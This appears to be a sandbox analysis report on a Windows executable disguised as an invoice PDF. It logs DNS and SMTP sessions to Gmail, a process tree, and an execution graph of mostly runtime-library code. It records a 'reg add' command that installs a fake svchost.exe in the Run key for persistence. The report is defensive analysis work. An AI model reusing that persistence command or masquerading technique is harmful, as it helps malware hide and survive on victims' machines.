                          Dec 4, 2021 23:23:33.517205954 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.544939995 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.545372963 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.546021938 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.574717045 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.575141907 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.603343964 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.618954897 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.647017956 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.707364082 CET49829587192.168.2.3142.250.145.109

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 4, 2021 23:22:00.746205091 CET5114353192.168.2.38.8.8.8
                          Dec 4, 2021 23:22:00.787013054 CET53511438.8.8.8192.168.2.3
                          Dec 4, 2021 23:22:16.199250937 CET4957253192.168.2.38.8.8.8
                          Dec 4, 2021 23:22:16.239649057 CET53495728.8.8.8192.168.2.3
                          Dec 4, 2021 23:22:31.635875940 CET6329753192.168.2.38.8.8.8
                          Dec 4, 2021 23:22:31.663851976 CET53632978.8.8.8192.168.2.3
                          Dec 4, 2021 23:22:47.018791914 CET5361553192.168.2.38.8.8.8
                          Dec 4, 2021 23:22:47.049907923 CET53536158.8.8.8192.168.2.3
                          Dec 4, 2021 23:23:02.406687021 CET5072853192.168.2.38.8.8.8
                          Dec 4, 2021 23:23:02.426625013 CET53507288.8.8.8192.168.2.3
                          Dec 4, 2021 23:23:17.804111004 CET6098253192.168.2.38.8.8.8
                          Dec 4, 2021 23:23:17.824145079 CET53609828.8.8.8192.168.2.3
                          Dec 4, 2021 23:23:33.163980007 CET6436753192.168.2.38.8.8.8
                          Dec 4, 2021 23:23:33.183679104 CET53643678.8.8.8192.168.2.3

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Dec 4, 2021 23:22:00.746205091 CET192.168.2.38.8.8.80xca6bStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                          Dec 4, 2021 23:22:16.199250937 CET192.168.2.38.8.8.80x953Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                          Dec 4, 2021 23:22:31.635875940 CET192.168.2.38.8.8.80x84a2Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                          Dec 4, 2021 23:22:47.018791914 CET192.168.2.38.8.8.80x159dStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                          Dec 4, 2021 23:23:02.406687021 CET192.168.2.38.8.8.80x1d6aStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                          Dec 4, 2021 23:23:17.804111004 CET192.168.2.38.8.8.80xd29dStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                          Dec 4, 2021 23:23:33.163980007 CET192.168.2.38.8.8.80x670Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Dec 4, 2021 23:22:00.787013054 CET8.8.8.8192.168.2.30xca6bNo error (0)smtp.gmail.com142.250.145.108A (IP address)IN (0x0001)
                          Dec 4, 2021 23:22:16.239649057 CET8.8.8.8192.168.2.30x953No error (0)smtp.gmail.com142.250.145.108A (IP address)IN (0x0001)
                          Dec 4, 2021 23:22:31.663851976 CET8.8.8.8192.168.2.30x84a2No error (0)smtp.gmail.com142.250.145.109A (IP address)IN (0x0001)
                          Dec 4, 2021 23:22:47.049907923 CET8.8.8.8192.168.2.30x159dNo error (0)smtp.gmail.com142.250.145.109A (IP address)IN (0x0001)
                          Dec 4, 2021 23:23:02.426625013 CET8.8.8.8192.168.2.30x1d6aNo error (0)smtp.gmail.com142.250.145.109A (IP address)IN (0x0001)
                          Dec 4, 2021 23:23:17.824145079 CET8.8.8.8192.168.2.30xd29dNo error (0)smtp.gmail.com142.250.145.108A (IP address)IN (0x0001)
                          Dec 4, 2021 23:23:33.183679104 CET8.8.8.8192.168.2.30x670No error (0)smtp.gmail.com142.250.145.109A (IP address)IN (0x0001)

                          SMTP Packets

                          TimestampSource PortDest PortSource IPDest IPCommands
                          Dec 4, 2021 23:22:00.877780914 CET58749751142.250.145.108192.168.2.3220 smtp.gmail.com ESMTP nb4sm4266060ejc.21 - gsmtp
                          Dec 4, 2021 23:22:00.933149099 CET58749751142.250.145.108192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:00.936467886 CET49751587192.168.2.3142.250.145.108STARTTLS
                          Dec 4, 2021 23:22:00.965125084 CET58749751142.250.145.108192.168.2.3220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:22:16.314048052 CET58749754142.250.145.108192.168.2.3220 smtp.gmail.com ESMTP g11sm4813068edz.53 - gsmtp
                          Dec 4, 2021 23:22:16.370438099 CET58749754142.250.145.108192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:16.370827913 CET49754587192.168.2.3142.250.145.108STARTTLS
                          Dec 4, 2021 23:22:16.398401976 CET58749754142.250.145.108192.168.2.3220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:22:31.723155975 CET58749775142.250.145.109192.168.2.3220 smtp.gmail.com ESMTP lk22sm4330193ejb.83 - gsmtp
                          Dec 4, 2021 23:22:31.761789083 CET58749775142.250.145.109192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:31.762145996 CET49775587192.168.2.3142.250.145.109STARTTLS
                          Dec 4, 2021 23:22:31.790158987 CET58749775142.250.145.109192.168.2.3220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:22:47.108661890 CET58749783142.250.145.109192.168.2.3220 smtp.gmail.com ESMTP d14sm4592640edu.57 - gsmtp
                          Dec 4, 2021 23:22:47.147772074 CET58749783142.250.145.109192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:47.148196936 CET49783587192.168.2.3142.250.145.109STARTTLS
                          Dec 4, 2021 23:22:47.175952911 CET58749783142.250.145.109192.168.2.3220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:23:02.488786936 CET58749796142.250.145.109192.168.2.3220 smtp.gmail.com ESMTP qk40sm4254137ejc.2 - gsmtp
                          Dec 4, 2021 23:23:02.537081957 CET58749796142.250.145.109192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:23:02.538055897 CET49796587192.168.2.3142.250.145.109STARTTLS
                          Dec 4, 2021 23:23:02.566308975 CET58749796142.250.145.109192.168.2.3220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:23:17.894715071 CET58749826142.250.145.108192.168.2.3220 smtp.gmail.com ESMTP a13sm4665468edk.29 - gsmtp
                          Dec 4, 2021 23:23:17.931472063 CET58749826142.250.145.108192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:23:17.931767941 CET49826587192.168.2.3142.250.145.108STARTTLS
                          Dec 4, 2021 23:23:17.959590912 CET58749826142.250.145.108192.168.2.3220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:23:33.256963015 CET58749829142.250.145.109192.168.2.3220 smtp.gmail.com ESMTP w23sm4686966edr.19 - gsmtp
                          Dec 4, 2021 23:23:33.395736933 CET58749829142.250.145.109192.168.2.3250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:23:33.397391081 CET49829587192.168.2.3142.250.145.109STARTTLS
                          Dec 4, 2021 23:23:33.425539970 CET58749829142.250.145.109192.168.2.3220 2.0.0 Ready to start TLS

                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: Cab_Invoice_pdf.exe PID: 2412 Parent PID: 1284

                          General

                          Start time:23:21:30
                          Start date:04/12/2021
                          Path:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
                          Imagebase:0x1310000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 6436 Parent PID: 572

                          General

                          Start time:23:21:32
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: Cab_Invoice_pdf.exe PID: 6476 Parent PID: 2412

                          General

                          Start time:23:21:44
                          Start date:04/12/2021
                          Path:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
                          Imagebase:0x1310000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 6724 Parent PID: 572

                          General

                          Start time:23:21:52
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 6780 Parent PID: 6476

                          General

                          Start time:23:21:58
                          Start date:04/12/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe""
                          Imagebase:0xd80000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 6804 Parent PID: 6780

                          General

                          Start time:23:21:59
                          Start date:04/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7f20f0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: reg.exe PID: 6860 Parent PID: 6780

                          General

                          Start time:23:21:59
                          Start date:04/12/2021
                          Path:C:\Windows\SysWOW64\reg.exe
                          Wow64 process (32bit):true
                          Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0x360000
                          File size:59392 bytes
                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 3176 Parent PID: 572

                          General

                          Start time:23:22:05
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 6308 Parent PID: 3352

                          General

                          Start time:23:22:13
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 3672 Parent PID: 572

                          General

                          Start time:23:22:14
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 6156 Parent PID: 3352

                          General

                          Start time:23:22:22
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 3108 Parent PID: 6308

                          General

                          Start time:23:22:53
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 6128 Parent PID: 6156

                          General

                          Start time:23:23:04
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: svchost.exe PID: 5028 Parent PID: 572

                          General

                          Start time:23:23:14
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: Cab_Invoice_pdf.exe PID: 2412 Parent PID: 1284 Cab_Invoice_pdf.exeCOMMON

                            Execution Graph

                            Execution Coverage:7.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:48

                            Graph

                            execution_graph 15676 1319f31 15677 1319f3d ___scrt_is_nonwritable_in_current_image 15676->15677 15678 1319f49 15677->15678 15679 1319f5e 15677->15679 15695 131c9ce 15678->15695 15689 131a847 EnterCriticalSection 15679->15689 15683 1319f6a 15690 1319f9e 15683->15690 15688 1319f59 ___scrt_is_nonwritable_in_current_image 15689->15683 15704 1319fc9 15690->15704 15692 1319fab 15693 131c9ce _free 20 API calls 15692->15693 15694 1319f77 15692->15694 15693->15694 15701 1319f94 15694->15701 15696 13244a9 _free 20 API calls 15695->15696 15697 1319f4e 15696->15697 15698 1321788 15697->15698 15932 132170d 15698->15932 15700 1321794 15700->15688 15953 131a85b LeaveCriticalSection 15701->15953 15703 1319f9c 15703->15688 15705 1319ff1 15704->15705 15706 1319fd7 15704->15706 15724 13209c5 15705->15724 15708 131c9ce _free 20 API calls 15706->15708 15710 1319fdc 15708->15710 15709 1319ffa 15731 13227ec 15709->15731 15711 1321788 pre_c_initialization 26 API calls 15710->15711 15721 1319fe7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15711->15721 15714 131a082 15718 131a09f 15714->15718 15720 131a0b1 15714->15720 15715 131a0fe 15716 131a10b 15715->15716 15715->15720 15717 131c9ce _free 20 API calls 15716->15717 15717->15721 15734 131a2e2 15718->15734 15720->15721 15746 131a15e 15720->15746 15721->15692 15725 13209d1 15724->15725 15726 13209e6 15724->15726 15727 131c9ce _free 20 API calls 15725->15727 15726->15709 15728 13209d6 15727->15728 15729 1321788 pre_c_initialization 26 API calls 15728->15729 15730 13209e1 15729->15730 15730->15709 15753 1322669 15731->15753 15733 131a016 15733->15714 15733->15715 15733->15721 15735 131a2f1 __wsopen_s 15734->15735 15736 13209c5 __fread_nolock 26 API calls 15735->15736 15737 131a304 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15736->15737 15739 13227ec 30 API calls 15737->15739 15745 131a310 15737->15745 15738 131786a _ValidateLocalCookies 5 API calls 15740 131a0a9 15738->15740 15741 131a35e 15739->15741 15740->15721 15742 131a390 ReadFile 15741->15742 15741->15745 15743 131a3b7 15742->15743 15742->15745 15744 13227ec 30 API calls 15743->15744 15744->15745 15745->15738 15747 13209c5 __fread_nolock 26 API calls 15746->15747 15748 131a16f 15747->15748 15749 13227ec 30 API calls 15748->15749 15752 131a1b7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15748->15752 15750 131a1f5 15749->15750 15751 13227ec 30 API calls 15750->15751 15750->15752 15751->15752 15752->15721 15754 1322675 ___scrt_is_nonwritable_in_current_image 15753->15754 15755 1322695 15754->15755 15756 132267d 15754->15756 15758 1322749 15755->15758 15763 13226cd 15755->15763 15788 131c9bb 15756->15788 15760 131c9bb __dosmaperr 20 API calls 15758->15760 15762 132274e 15760->15762 15761 131c9ce _free 20 API calls 15766 132268a ___scrt_is_nonwritable_in_current_image 15761->15766 15764 131c9ce _free 20 API calls 15762->15764 15778 131e6a9 EnterCriticalSection 15763->15778 15767 1322756 15764->15767 15766->15733 15769 1321788 pre_c_initialization 26 API calls 15767->15769 15768 13226d3 15770 13226f7 15768->15770 15771 132270c 15768->15771 15769->15766 15772 131c9ce _free 20 API calls 15770->15772 15779 132276e 15771->15779 15774 13226fc 15772->15774 15775 131c9bb __dosmaperr 20 API calls 15774->15775 15776 1322707 15775->15776 15791 1322741 15776->15791 15778->15768 15794 131e926 15779->15794 15781 1322780 15782 1322788 15781->15782 15783 1322799 SetFilePointerEx 15781->15783 15784 131c9ce _free 20 API calls 15782->15784 15785 13227b1 GetLastError 15783->15785 15787 132278d 15783->15787 15784->15787 15807 131c998 15785->15807 15787->15776 15812 13244a9 GetLastError 15788->15812 15931 131e760 LeaveCriticalSection 15791->15931 15793 1322747 15793->15766 15795 131e933 15794->15795 15796 131e948 15794->15796 15797 131c9bb __dosmaperr 20 API calls 15795->15797 15798 131c9bb __dosmaperr 20 API calls 15796->15798 15800 131e96d 15796->15800 15799 131e938 15797->15799 15801 131e978 15798->15801 15802 131c9ce _free 20 API calls 15799->15802 15800->15781 15803 131c9ce _free 20 API calls 15801->15803 15804 131e940 15802->15804 15805 131e980 15803->15805 15804->15781 15806 1321788 pre_c_initialization 26 API calls 15805->15806 15806->15804 15808 131c9bb __dosmaperr 20 API calls 15807->15808 15809 131c9a3 _free 15808->15809 15810 131c9ce _free 20 API calls 15809->15810 15811 131c9b6 15810->15811 15811->15787 15813 13244c2 15812->15813 15814 13244c8 15812->15814 15831 132380c 15813->15831 15818 132451f SetLastError 15814->15818 15838 1320b10 15814->15838 15819 131c9c0 15818->15819 15819->15761 15823 13244e2 15845 13209eb 15823->15845 15824 13244fe 15858 1324297 15824->15858 15825 13244e8 15827 1324516 SetLastError 15825->15827 15827->15819 15863 1323587 15831->15863 15833 1323833 15834 132384b TlsGetValue 15833->15834 15835 132383f 15833->15835 15834->15835 15869 131786a 15835->15869 15837 132385c 15837->15814 15843 1320b1d _free 15838->15843 15839 1320b5d 15842 131c9ce _free 19 API calls 15839->15842 15840 1320b48 RtlAllocateHeap 15841 1320b5b 15840->15841 15840->15843 15841->15823 15851 1323862 15841->15851 15842->15841 15843->15839 15843->15840 15884 1328686 15843->15884 15846 13209f6 RtlFreeHeap 15845->15846 15850 1320a1f _free 15845->15850 15847 1320a0b 15846->15847 15846->15850 15848 131c9ce _free 18 API calls 15847->15848 15849 1320a11 GetLastError 15848->15849 15849->15850 15850->15825 15852 1323587 _free 5 API calls 15851->15852 15853 1323889 15852->15853 15854 13238a4 TlsSetValue 15853->15854 15855 1323898 15853->15855 15854->15855 15856 131786a _ValidateLocalCookies 5 API calls 15855->15856 15857 13238b5 15856->15857 15857->15823 15857->15824 15899 132426f 15858->15899 15866 13235b3 15863->15866 15868 13235b7 __crt_fast_encode_pointer 15863->15868 15864 13235d7 15867 13235e3 GetProcAddress 15864->15867 15864->15868 15866->15864 15866->15868 15876 1323623 15866->15876 15867->15868 15868->15833 15870 1317873 15869->15870 15871 1317875 IsProcessorFeaturePresent 15869->15871 15870->15837 15873 1317bc6 15871->15873 15883 1317b8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15873->15883 15875 1317ca9 15875->15837 15877 1323644 LoadLibraryExW 15876->15877 15878 1323639 15876->15878 15879 1323661 GetLastError 15877->15879 15882 1323679 15877->15882 15878->15866 15880 132366c LoadLibraryExW 15879->15880 15879->15882 15880->15882 15881 1323690 FreeLibrary 15881->15878 15882->15878 15882->15881 15883->15875 15889 13286ca 15884->15889 15886 132869c 15887 131786a _ValidateLocalCookies 5 API calls 15886->15887 15888 13286c6 15887->15888 15888->15843 15890 13286d6 ___scrt_is_nonwritable_in_current_image 15889->15890 15895 1325ffe EnterCriticalSection 15890->15895 15892 13286e1 15896 1328713 15892->15896 15894 1328708 ___scrt_is_nonwritable_in_current_image 15894->15886 15895->15892 15897 1326046 _abort LeaveCriticalSection 15896->15897 15898 132871a 15897->15898 15898->15894 15905 13241af 15899->15905 15901 1324293 15902 132421f 15901->15902 15915 13240b3 15902->15915 15906 13241bb ___scrt_is_nonwritable_in_current_image 15905->15906 15911 1325ffe EnterCriticalSection 15906->15911 15908 13241c5 15912 13241eb 15908->15912 15910 13241e3 ___scrt_is_nonwritable_in_current_image 15910->15901 15911->15908 15913 1326046 _abort LeaveCriticalSection 15912->15913 15914 13241f5 15913->15914 15914->15910 15931->15793 15933 13244a9 _free 20 API calls 15932->15933 15934 1321723 15933->15934 15935 1321782 15934->15935 15936 1321731 15934->15936 15943 1321798 IsProcessorFeaturePresent 15935->15943 15940 131786a _ValidateLocalCookies 5 API calls 15936->15940 15938 1321787 15939 132170d pre_c_initialization 26 API calls 15938->15939 15941 1321794 15939->15941 15942 1321758 15940->15942 15941->15700 15942->15700 15944 13217a3 15943->15944 15947 13215be 15944->15947 15948 13215da _abort ___scrt_get_show_window_mode 15947->15948 15949 1321606 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15948->15949 15950 13216d7 _abort 15949->15950 15951 131786a _ValidateLocalCookies 5 API calls 15950->15951 15952 13216f5 GetCurrentProcess TerminateProcess 15951->15952 15952->15938 15953->15703 20167 1326ba5 20168 1326bb1 ___scrt_is_nonwritable_in_current_image 20167->20168 20175 1325ffe EnterCriticalSection 20168->20175 20170 1326bbc 20176 1326bfa 20170->20176 20174 1326be6 ___scrt_is_nonwritable_in_current_image 20175->20170 20177 1326c09 20176->20177 20178 1326c1c 20176->20178 20179 131c9ce _free 20 API calls 20177->20179 20181 1326c2e 20178->20181 20182 1326c6f 20178->20182 20180 1326c0e 20179->20180 20183 1321788 pre_c_initialization 26 API calls 20180->20183 20197 1326aab 20181->20197 20184 131c9ce _free 20 API calls 20182->20184 20188 1326bd2 20183->20188 20185 1326c74 20184->20185 20187 1321788 pre_c_initialization 26 API calls 20185->20187 20187->20188 20194 1326bf1 20188->20194 20190 1320a73 26 API calls 20191 1326c8a 20190->20191 20191->20188 20192 1321798 __wsopen_s 11 API calls 20191->20192 20193 1326ca1 20192->20193 20264 1326046 LeaveCriticalSection 20194->20264 20196 1326bf8 20196->20174 20199 1326ab8 20197->20199 20198 1326b0c 20198->20188 20198->20190 20199->20198 20201 132c265 20199->20201 20202 132c273 20201->20202 20205 132c28e 20202->20205 20206 131afae __cftof 38 API calls 20205->20206 20207 132c2a4 20206->20207 20208 132c2c0 20207->20208 20210 132c2d7 20207->20210 20222 132c289 20207->20222 20209 131c9ce _free 20 API calls 20208->20209 20211 132c2c5 20209->20211 20212 132c2f2 20210->20212 20213 132c2e0 20210->20213 20214 1321788 pre_c_initialization 26 API calls 20211->20214 20216 132c312 20212->20216 20217 132c2ff 20212->20217 20215 131c9ce _free 20 API calls 20213->20215 20214->20222 20218 132c2e5 20215->20218 20225 132d2f2 20216->20225 20219 132b68e 46 API calls 20217->20219 20221 1321788 pre_c_initialization 26 API calls 20218->20221 20219->20222 20221->20222 20222->20199 20224 131c9ce _free 20 API calls 20224->20222 20226 131afae __cftof 38 API calls 20225->20226 20227 132d305 20226->20227 20230 132d04a 20227->20230 20234 132d07e 20230->20234 20231 131786a _ValidateLocalCookies 5 API calls 20232 132c328 20231->20232 20232->20222 20232->20224 20233 132d16c MultiByteToWideChar 20235 132d18a 20233->20235 20241 132d0a5 20233->20241 20234->20233 20236 132d0f1 GetCPInfo 20234->20236 20234->20241 20238 1320a25 __fread_nolock 21 API calls 20235->20238 20242 132d1ab 20235->20242 20237 132d100 20236->20237 20236->20241 20237->20233 20237->20241 20238->20242 20239 132d2cf 20244 132815e __freea 20 API calls 20239->20244 20240 132d1fe MultiByteToWideChar 20240->20239 20243 132d21a MultiByteToWideChar 20240->20243 20241->20231 20242->20239 20242->20240 20243->20239 20245 132d234 20243->20245 20244->20241 20246 1320a25 __fread_nolock 21 API calls 20245->20246 20249 132d255 20245->20249 20246->20249 20247 132d292 MultiByteToWideChar 20248 132d2c2 20247->20248 20250 132d2a9 20247->20250 20252 132815e __freea 20 API calls 20248->20252 20249->20247 20249->20248 20253 13236ec 20250->20253 20252->20239 20261 132356d 20253->20261 20256 1323a08 10 API calls 20257 1323748 CompareStringW 20256->20257 20258 1323708 20257->20258 20259 131786a _ValidateLocalCookies 5 API calls 20258->20259 20260 132375a 20259->20260 20260->20248 20262 1323587 _free 5 API calls 20261->20262 20263 1323583 20262->20263 20263->20256 20263->20258 20264->20196 20265 13178ad 20266 13178b5 pre_c_initialization 20265->20266 20283 131d815 20266->20283 20268 13178c0 pre_c_initialization 20290 1317e3b 20268->20290 20270 1317949 20271 1318111 ___scrt_fastfail 4 API calls 20270->20271 20273 1317950 ___scrt_initialize_default_local_stdio_options 20271->20273 20272 13178d5 __RTC_Initialize 20272->20270 20295 1317fdc 20272->20295 20275 13178ee pre_c_initialization 20275->20270 20276 13178ff 20275->20276 20298 13180a9 InitializeSListHead 20276->20298 20278 1317904 pre_c_initialization 20299 13180b5 20278->20299 20280 1317927 pre_c_initialization 20305 1320335 20280->20305 20282 1317932 pre_c_initialization 20284 131d847 20283->20284 20285 131d824 20283->20285 20284->20268 20285->20284 20286 131c9ce _free 20 API calls 20285->20286 20287 131d837 20286->20287 20288 1321788 pre_c_initialization 26 API calls 20287->20288 20289 131d842 20288->20289 20289->20268 20291 1317e49 20290->20291 20294 1317e4e ___scrt_initialize_onexit_tables 20290->20294 20292 1318111 ___scrt_fastfail 4 API calls 20291->20292 20291->20294 20293 1317ed1 20292->20293 20294->20272 20312 1317fa1 20295->20312 20298->20278 20378 13208ce 20299->20378 20301 13180c6 20302 13180cd 20301->20302 20303 1318111 